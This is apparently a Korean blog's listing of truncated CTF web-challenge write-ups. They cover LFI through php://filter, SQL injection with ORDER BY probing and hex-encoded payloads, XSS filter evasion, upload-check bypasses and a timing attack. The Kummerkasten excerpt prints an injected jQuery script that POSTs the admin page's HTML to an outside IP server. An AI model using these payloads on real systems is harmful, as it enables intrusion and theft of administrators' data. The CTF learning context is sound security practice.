- Hack No-Jam(CTF 서버가 내려가서 비슷하게 구축하긴 했는데 다소 다른 부분이 있습니다.) Accounts 페이지를 보면 현재 가입된 계정 정보를 알 수 있다. ?p=pages/home?p=pages/accounts위 두 그림을 보면 위와 같이 인자 값을 받아서 페이지를 보여주는 것을 알 수 있고 이를 통해서 home.php, accounts.php 파일을 호출해서 보여준다는 것을 추측할 수 있다..php 부분이 없기 때문에 이 부분은 소스 코드에서 .php를 붙여서 호출한다는 것도 추측이 가능하다.즉, LFI 공격이 가능할 수도 있기 때문에 php://filter/convert.base64-encode/resource= 를 이용해서 소스 코드를 알아낼 수 있다. 위와 같은 방법으로 소스 코..
- Combination Pizza(CTF 서버가 내려가서 비슷하게 구축하긴 했는데 다소 다른 부분이 있습니다.) 메인 페이지는 민들레가 흩날리고... 블로그 메뉴에 들어가보면 3개의 글을 볼 수 있다. 첫 번째 글을 선택해보면, 파라미터 값에 id=1 이 추가된 것과 해당 글의 내용을 자세히 볼 수 있다. id의 값을 2로 변경해보면 두 번째 글을 읽을 수가 있고... id의 값을 3으로 변경해보면 세 번째 글을 읽을 수가 있다. (의미심장한 말과 함께...) id의 값을 4로 변경해보면 해당되는 글이 없어서 정보가 표시되지 않는 것을 볼 수 있다. id=1' ORDER BY 1-- -...id=1' ORDER BY 6-- -까지는 첫 번째 글에 대한 정보를 볼 수 있지만,id=1' ORDER BY 7..
AFSRC-Market 회원가입 후 로그인을 해보면 물건을 구입할 수 있는 사이트를 볼 수 있고, 계정 정보를 눌러서 The Last cost 를 보면 값이 비어있는 것을 볼 수 있다. 장바구니에 물건을 넣으면서 돌아다니다가 다시 정보를 확인해보면 The Last cost 값이 변한 것을 알 수 있다.즉, 장바구니에 담는 행동에 따라서 The Last cost 값이 변한다고 가정을 하고 몇 가지 테스트를 해보면 SQL Injection 공격을 할 수 있다. 초기값: 장바구니에 담을 때 id 값에 문자가 들어가면 Code Error 메시지가 발생하기 때문에 공격 구문을 Hex로 하였다.0x39303420616e6420313d3123 (904 and 1=1#)0x39303420616e6420313d3223 ..
Flag-Man Github 아이콘과 함께 login 그리고 오직 / and /user 만 있고 다른 페이지는 없다고 한다. (callback은?) 문제에서 주어진 /user 에도 이동해보면 달랑 please login first. 만 있는 줄 알았는데 마우스로 드래그해보면 Flask로 동작하고 있다는 것을 알 수 있다. login을 눌러보면 내 Github 계정의 권한을 요청한다. 요청을 허가하고 나면 /user/ 에 접근이 가능하고 Github 계정 사진 정보와 uid, id 번호 값을 가져오는 것을 알 수 있고 쿠키를 확인해보면 그전에 없던 session 이라는 것이 생성되어 있는 것을 알 수 있다. session: eyJpbmZvIjpbMiwiZG85ZGFyayIsMTY1MDgzNzAsImh0dH..
Legend ? Legend ! Legend! We make web a beautiful place. 라는 문구와 함께 메일을 입력하여 뉴스레터에 가입하는 기능과 여러가지 메뉴들이 보인다. Portfolio를 누르면 하단으로 이동은 되지만, 다른 기능들은 눌러봐도 아무런 동작을 하지 않는다. Portfolio 중에서 가장 처음에 있는 Ethan Marcotte Design의 VIEW PROJECT를 클릭해보았다. 클릭을 해보면 index.php 페이지에서 news.php 페이지로 이동하고 newsid 라는 파라미터가 1이란 값을 가지는 것을 볼 수 있다.동일한 방법으로 다른 숫자들을 입력해보면 1, 4 | 2, 5 | 3, 6 끼리 같은 내용을 가져오고 다른 숫자들을 입력해면 index.php 페이지로 ..
Can You Hit ME ? 아래 그림을 보면 알 수 있듯이 XSS 공격을 하면 된다. xss 파라미터를 통해서 기본적인 스크립트를 삽입해보면 아래와 같이 표시된다.xss= , script가 _ 로 변경된 것을 볼 수 있다. (:, java, document도 변경된다.)on, eval의 경우 입력하면 값이 사라지는데 이 점을 이용해서 script와 같이 변경되는 문자 사이에 삽입하면 script글자가 변경되는 것을 우회할 수 있다.scronipt >>> script (대소문자를 변경해서도 가능)하지만, 가 _로 변경되는 것은 위 방법으로 해결할 수가 없다. 소스 코드를 보면 js.js 라는 파일에 의해서 필터링이 되는 것을 알 수 있다. 너무 길어서 파일로 첨부 여기서부터는 아래 두 내용 참조http..
Up!Up!Up! 파일을 선택하여 업로드할 수 있고 10분마다 업로드한 파일이 삭제되고 있다. 소스 코드 정상적인 이미지 파일을 올리면 업로드되어 저장된 경로가 표시된다. 파일명이 변경되고 업로드한 파일의 확장자가 아니라 강제로 .jpg 확장자로 저장된다. php 확장자 사용할 경우 Invalid file이 발생한다. Content-Type이 image가 아닐 경우 Please Give Me a Picture가 발생한다. 즉, Content-Type은 image/jpeg, image/png로 확장자는 php로 업로드 해야한다.이 문제는 multipart/form-data를 검증하는 부분에서 발생한다. 逐浪 CMS 2.4 (zoomla)위 CMS에서 발생했던 취약점을 토대로 만든 문제로 생각이 든다.해당 ..
The Blog를 눌러서 문제 서버에 접근해보면 기사들을 접할 수 있다. 소스를 확인해보면 여러 정보를 획득할 수 있다. 위 정보를 통해서 상위 경로로 올라가다보면 아래와 같이 디렉터리 인덱싱이 되는 것을 확인할 수 있고 flag/ 디렉터리가 있다는 것을 알 수 있다. 하지만, 해당 디렉터리에 접근해보면 Forbidden 메시지와 함께 접근할 수 없다. 다시 소스를 확인해보면 위와 같은 정보를 확인할 수 있고 LFI 취약점이 발생할 수 있다는 가정을 하고 아래와 같이 시도하였다.http://ctf.sharif.edu:31455/chal/technews/0ca1c5fd5d487c49/images.php?id=php://filter/convert.base64-encode/resource=files/image..
해당 내용은 CTF 종료 후 서버가 일부 동작하지 않아 정확하지 않은 부분이 있을 수 있습니다. 귀여운 고양이 두마리가 반겨주는 블로그아래쪽에는 글을 남길 수가 있다. 메인 페이지에서 다른 페이지가 직접적으로 나타난 부분은 없지만 많이 사용하는 페이지명을 입력해보면 아래와 같이 login.php 페이지가 존재하는 것을 확인할 수 있고, admin.php 페이지도 접근은 안되지만 접근 시도 시 login.php 페이지로 이동되는 것을 확인할 수 있다. 다시 메인 페이지로 돌아와서, 간단하게 alert 창을 띄우는 스크립트를 삽입해보았다.alert('xss'); 작성한 다음 다시 메인 페이지에 접근해보면 아래와 같이 창이 발생하여 삽입한 스크립트가 정상적으로 동작하는 것을 확인할 수 있다. 소스를 보면 삽입..
- ITD 문제 서버가 닫혀있어서 찾아보니 소스를 공개해놓은 것이 있어서 개인 서버에 구축하였다.http://rnd.do9.kr:8080/글이 포스팅되어있는 사이트를 볼 수 있다. 위에 ImTooDeep 글을 눌러보면 해당 글의 전문을 확인할 수 있다.URL에 보면 /?p=ImTooDeep 형태로 데이터를 가져오는 것을 볼 수 있고, 실제로 http://rnd.do9.kr:8080/posts/ImTooDeep로 직접 접근해보면 해당 글의 내용만 나오는 것을 볼 수 있다. http://rnd.do9.kr:8080/posts/ImTooDeep 직접 접근 File Inclusion에 취약할 것이라고 생각하고 /posts/index.php 파일을 호출해보면 PHP 코드가 일부 깨져서 나오는 것을 확인할 수 있다..
- Sequence Hunt http://136.243.194.36:18888 send them as GET parameters here 를 선택하면 아래 페이지로 이동되고 인자가 없다는 메시지를 볼 수 있다. val0 파라미터 인자를 만들어주고 다시 접근해보면 val1 인자가 없다는 메시지를 확인할 수 있고 동일하게 인자를 만들어서 접근해준다. 인자를 다 만들어주고 나면 접속한 사용자의 IP 주소와 함께 값이 틀렸다는 메시지를 확인할 수 있다. 다시 메인 페이지로 돌아가서 get some info about you here 를 선택하면 아래 페이지로 이동되고 요청한 횟수를 확인할 수 있다. 그리고, Someone sent me this 를 선택해보면 Timing attack(https://en.wiki..
- Kummerkasten this site를 눌러보면 아래 사이트로 이동한다.해당 사이트는 관리자에게 메시지를 보낼 수 있는 기능이 있는 사이트이다. 간단하게 메시지를 전송 전송 결과로는 의미있는 정보를 얻기가 힘들다. Your Message 부분에 스크립트를 삽입하여 해당 메시지를 받아보는 관리자가 보는 페이지를 개인 서버 쪽으로 전송하도록 처리하였다.123456789$.ajax({ type: "POST", url: "http://14.36.23.78:1337/pwn", data: { 'data':document.documentElement.outerHTML }});Colored by Color Scriptercs 서버 쪽에서는 전송된 내용을 받아서 처리할 수 있도록 파이썬으로 아래 코드를 실행해놓은..
- TinyHosting 문제 서버가 닫혀있어서 캐쉬를 긁어모아서 개인 서버에 비슷하게 구축하였다.http://rnd.do9.kr/tiny/ 소스를 보면 주석으로 처리된 값을 확인할 수 있다. 주석으로 처리된 값을 파라미터로 전송하게 되면 index.php 소스 코드를 볼 수 있다. index.php12345678910111213141516171819202122232425262728293031323334353637383940 TinyHosting Filename: Content: Create! Colored by Color Scriptercs 소스 코드를 보면 REMOTE_ADDR 값과 HTTP_USER_AGENT 값을 더한 다음 SHA1으로 암호화한 값을 디렉터리 경로로 해서 index.html 파일이..
- MonkeyBase http://136.243.194.35/ 문제에서 주어진 Invite key 값을 이용해서 등록 등록한 계정으로 로그인하면 아래 그림과 같이 온라인 채팅 사이트에 접속할 수 있다. ONLINE USERS에 있는 계정을 선택하면 URL에 ?id=1 파라미터가 추가되면서 채팅을 할 수 있다. Hello 입력 결과 톱니바퀴 모양 버튼을 눌러보면 Settings, Help, Logout 기능을 볼 수 있다.다른 기능을 알아보기 위해서 Help를 선택 HELP를 누르면 BBCODES 라는 것에 대한 설명이 나와있다. BBCODES 중에서 [URL]URL[/URL]을 이용해서 [URL]http://rnd.do9.kr/[/URL]을 테스트로 입력하였다. [URL]http://rnd.do9.kr..
- forth nc 또는 putty 같은 것을 이용해서 IP는 136.243.194.49, 포트는 1024로 접속하게 되면 yForth 라는 서버에 접속을 할 수 있다. forth에 대해서 찾아보면 아래와 같이 프로그래밍 언어라는 것을 검색을 통해서 알 수 있다."Forth is an imperative stack-based computer programming language" 간단하게 계산을 해보면 특징을 알 수 있다.1 + 1 = 23 + 7 - 1 = 9위와 같은 연산을 forth 언어로 처리해보면 아래와 같다. 1 1 + .1) 1을 스택에 넣는다.2) 1을 스택에 넣는다.3) 스택에서 두 값을 꺼내서 더하기(+)를 한 값(2)을 다시 넣는다.4) 스택에 있는 값을 출력한다. 3 7 + 1 - ..
□ description==========================================You're welcome to betatest our new social media site, it's going to be the next big thing. Server : http://54.64.164.100:5555/Script : http://binary.grayhash.com/2a0182588cf5550cebb49876d94c7a2f/index.py - option : please check the notice board.========================================== http://54.64.164.100:5555/ http://binary.grayhash.com/2..
□ description ========================================== http://54.65.205.135/owlur/ if you use a web scanner, your IP will get banned no bruteforce required, take it easy ========================================== http://54.64.81.174/owlur/ 파일을 업로드할 수 있는 사이트가 있다. Click here to view a random owl. here 를 누르면 아래와 같이 부엉이(무작위)를 볼 수 있다. http://54.64.81.174/owlur/index.php?page=view&id=random page 파라미..